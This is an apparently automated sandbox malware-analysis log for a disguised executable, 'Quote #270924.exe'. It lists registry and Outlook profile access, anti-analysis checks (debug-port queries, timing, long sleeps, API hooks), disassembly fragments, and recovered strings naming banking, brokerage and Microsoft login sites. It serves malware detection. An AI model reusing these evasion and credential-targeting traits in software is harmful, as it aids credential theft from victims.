            Source: C:\Users\user\Desktop\Quote #270924.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\Robocopy.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Quote #270924.exe Static file information: File size 1366661 > 1048576
            Source: Binary string: robocopy.pdb source: svchost.exe, 00000002.00000003.2241073869.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241073869.000000000083B000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985552449.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HoiWfznxKU.exe, 00000003.00000000.2197455182.000000000057E000.00000002.00000001.01000000.00000004.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344151814.000000000057E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.2175621784.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2177443732.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2277774868.000000000460F000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2275494698.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.2175621784.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2177443732.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, Robocopy.exe, 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2277774868.000000000460F000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2275494698.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: robocopy.pdbGCTL source: svchost.exe, 00000002.00000003.2241073869.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241073869.000000000083B000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985552449.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: Robocopy.exe, 00000004.00000002.3987313418.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002D35000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344639138.0000000002A0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2561116373.0000000006A0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: Robocopy.exe, 00000004.00000002.3987313418.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002D35000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344639138.0000000002A0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2561116373.0000000006A0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Quote #270924.exeStatic PE information: real checksum: 0xa961f should be: 0x158e8d
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D919 push ds; iretd 2_2_0040D91A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F2A2 push esi; iretd 2_2_0041F2AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C4C push edi; iretd 2_2_00416C5E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C53 push edi; iretd 2_2_00416C5E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418505 push ebp; iretd 2_2_00418506
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AD9E push es; iretd 2_2_0041AD9F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004036A0 push eax; ret 2_2_004036A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00425743 push edi; iretd 2_2_0042574E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167C3 push ecx; iretd 2_2_004167EA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D7FF push FFFFFFFEh; retf 2_2_0040D801
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00423F83 push edi; iretd 2_2_00423F8C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047F09AD push ecx; mov dword ptr [esp], ecx4_2_047F09B6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008220A0 push edi; iretd 4_2_008220AB
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008240D0 push FFFFFFDEh; retf 4_2_0082420F
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_00813120 push ecx; iretd 4_2_00813147
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008135A9 push edi; iretd 4_2_008135BB
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008135B0 push edi; iretd 4_2_008135BB
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008215CD push FFFFFFC2h; iretd 4_2_008215CF
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008126AF push 00000046h; iretd 4_2_0081275B
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008176FB push es; iretd 4_2_008176FC
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008208DE push edi; iretd 4_2_008208E9
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008208E0 push edi; iretd 4_2_008208E9
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0081BBFF push esi; iretd 4_2_0081BC08
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_00814E62 push ebp; iretd 4_2_00814E63
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046B5557 pushfd ; retf 4_2_046B555A
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046B15A0 push cs; iretd 4_2_046B15A1
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BE68E push esi; iretd 4_2_046BE68F
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BF74F push ds; iretd 4_2_046BF750
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BF031 push eax; iretd 4_2_046BF034
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BD216 push 8702727Ah; ret 4_2_046BD21C
            Source: C:\Users\user\Desktop\Quote #270924.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Quote #270924.exeAPI/Special instruction interceptor: Address: 41BD6CC
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD1C0 rdtsc 2_2_030AD1C0
            Source: C:\Windows\SysWOW64\Robocopy.exeWindow / User API: threadDelayed 3902
            Source: C:\Windows\SysWOW64\Robocopy.exeWindow / User API: threadDelayed 6070
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7652Thread sleep count: 3902 > 30
            Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7652Thread sleep time: -7804000s >= -30000s
            Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7652Thread sleep count: 6070 > 30
            Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7652Thread sleep time: -12140000s >= -30000s
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe TID: 7684Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe TID: 7684Thread sleep count: 33 > 30
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe TID: 7684Thread sleep time: -33000s >= -30000s
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe TID: 7684Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\Robocopy.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0081C8D0 FindFirstFileW,FindNextFileW,FindClose,4_2_0081C8D0
            Source: 40mEe3Hg.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 40mEe3Hg.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 40mEe3Hg.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 40mEe3Hg.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: HoiWfznxKU.exe, 00000006.00000002.3985470272.0000000000A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: 40mEe3Hg.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 40mEe3Hg.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 40mEe3Hg.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 40mEe3Hg.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 40mEe3Hg.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 40mEe3Hg.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 40mEe3Hg.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: firefox.exe, 00000007.00000002.2562350080.000002D1068FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==E.P
            Source: 40mEe3Hg.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 40mEe3Hg.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 40mEe3Hg.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 40mEe3Hg.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 40mEe3Hg.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 40mEe3Hg.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 40mEe3Hg.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD1C0 rdtsc 2_2_030AD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417E93 LdrLoadDll,2_2_00417E93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031052E2 mov eax, dword ptr fs:[00000030h]2_2_031052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF2F8 mov eax, dword ptr fs:[00000030h]2_2_030EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030292FF mov eax, dword ptr fs:[00000030h]2_2_030292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03031131 mov eax, dword ptr fs:[00000030h]2_2_03031131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03031131 mov eax, dword ptr fs:[00000030h]2_2_03031131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B136 mov eax, dword ptr fs:[00000030h]2_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B136 mov eax, dword ptr fs:[00000030h]2_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B136 mov eax, dword ptr fs:[00000030h]2_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B136 mov eax, dword ptr fs:[00000030h]2_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105152 mov eax, dword ptr fs:[00000030h]2_2_03105152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029148 mov eax, dword ptr fs:[00000030h]2_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029148 mov eax, dword ptr fs:[00000030h]2_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029148 mov eax, dword ptr fs:[00000030h]2_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029148 mov eax, dword ptr fs:[00000030h]2_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037152 mov eax, dword ptr fs:[00000030h]2_2_03037152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C9179 mov eax, dword ptr fs:[00000030h]2_2_030C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03087190 mov eax, dword ptr fs:[00000030h]2_2_03087190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E11A4 mov eax, dword ptr fs:[00000030h]2_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E11A4 mov eax, dword ptr fs:[00000030h]2_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E11A4 mov eax, dword ptr fs:[00000030h]2_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E11A4 mov eax, dword ptr fs:[00000030h]2_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B0 mov eax, dword ptr fs:[00000030h]2_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306D1D0 mov eax, dword ptr fs:[00000030h]2_2_0306D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0306D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031051CB mov eax, dword ptr fs:[00000030h]2_2_031051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030351ED mov eax, dword ptr fs:[00000030h]2_2_030351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D71F9 mov esi, dword ptr fs:[00000030h]2_2_030D71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
